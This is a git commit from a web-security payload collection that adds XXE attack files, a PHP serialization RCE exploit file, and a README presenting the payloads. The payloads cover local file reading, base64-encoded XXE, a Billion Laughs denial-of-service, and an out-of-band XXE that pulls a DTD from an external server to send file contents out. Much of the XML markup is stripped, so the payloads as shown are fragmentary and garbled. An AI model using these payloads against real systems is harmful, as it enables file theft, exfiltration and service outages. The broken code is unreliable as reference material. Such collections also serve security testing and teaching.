From c097f222f449376d0b9fe183dafd0f52c1a39f08 Mon Sep 17 00:00:00 2001 From: swisskyrepo Date: Tue, 18 Oct 2016 14:06:10 +0700 Subject: [PATCH] XXE payloads --- .../PHP-Serialization-RCE-Exploit.php | 32 +++++++++++++ README.md | 18 ++++++- XXE/Classic XXE B64 Encoded.xml | 1 + XXE/Classic XXE.xml | 6 +++ XXE/Deny Of Service - Billion Laugh Attack | 8 ++++ XXE/README.md | 48 ++++++++++++++++--- XXE/XXE OOB Attack (Yunusov, 2013).xml | 9 ++++ 7 files changed, 114 insertions(+), 8 deletions(-) create mode 100755 PHP_Serialization/PHP-Serialization-RCE-Exploit.php create mode 100755 XXE/Classic XXE B64 Encoded.xml create mode 100755 XXE/Classic XXE.xml create mode 100755 XXE/Deny Of Service - Billion Laugh Attack create mode 100755 XXE/XXE OOB Attack (Yunusov, 2013).xml diff --git a/PHP_Serialization/PHP-Serialization-RCE-Exploit.php b/PHP_Serialization/PHP-Serialization-RCE-Exploit.php new file mode 100755 index 0000000..af0aae4 --- /dev/null +++ b/PHP_Serialization/PHP-Serialization-RCE-Exploit.php @@ -0,0 +1,32 @@ + diff --git a/README.md b/README.md index 2e31ff9..094b93c 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,18 @@ -/!\ Work in Progress : 1% - # PayloadsAllTheThings A list of every usefull payloads and bypass for Web Application Security + +TODO: +* XSS +* Upload +* Traversal Directory +* Tar +* SSRF +* PHP Serialization +* CSV Injection + +To improve: +* RCE +* SQL injection +* XXE + +# /!\ Work in Progress : 1% diff --git a/XXE/Classic XXE B64 Encoded.xml b/XXE/Classic XXE B64 Encoded.xml new file mode 100755 index 0000000..bc4f01d --- /dev/null +++ b/XXE/Classic XXE B64 Encoded.xml @@ -0,0 +1 @@ + %init; ]> \ No newline at end of file diff --git a/XXE/Classic XXE.xml b/XXE/Classic XXE.xml new file mode 100755 index 0000000..02f0b27 --- /dev/null +++ b/XXE/Classic XXE.xml @@ -0,0 +1,6 @@ + + + +]> +&file; \ No newline at end of file diff --git a/XXE/Deny Of Service - Billion Laugh Attack b/XXE/Deny Of Service - Billion Laugh Attack new file mode 100755 index 0000000..e4f2199 --- /dev/null +++ b/XXE/Deny Of Service - Billion Laugh Attack @@ -0,0 +1,8 @@ + + + + + +]> +&a4; \ No newline at end of file diff --git a/XXE/README.md b/XXE/README.md index c707ab4..da29ba9 100644 --- a/XXE/README.md +++ b/XXE/README.md @@ -1,12 +1,48 @@ -# Title -Lorem +# XML External Entity +An XML External Entity attack is a type of attack against an application that parses XML input -## Vuln +## Exploit +Classic XXE ``` -Code + + + +]> +&file; ``` +Classic XXE Base64 encoded +``` + %init; ]> +``` + +Deny Of Service - Billion Laugh Attack +``` + + + + + +]> +&a4; +``` + + +XXE OOB Attack (Yunusov, 2013) +``` + + +&send; + +File stored on http://publicServer.com/parameterEntity_oob.dtd + +"> +%all; +``` + + ## Thanks to -* Lorem -* Ipsum \ No newline at end of file +* https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing \ No newline at end of file diff --git a/XXE/XXE OOB Attack (Yunusov, 2013).xml b/XXE/XXE OOB Attack (Yunusov, 2013).xml new file mode 100755 index 0000000..d36bca6 --- /dev/null +++ b/XXE/XXE OOB Attack (Yunusov, 2013).xml @@ -0,0 +1,9 @@ +XXE OOB Attack (Yunusov, 2013) + + +&send; + +File stored on http://publicServer.com/parameterEntity_oob.dtd + +"> +%all; \ No newline at end of file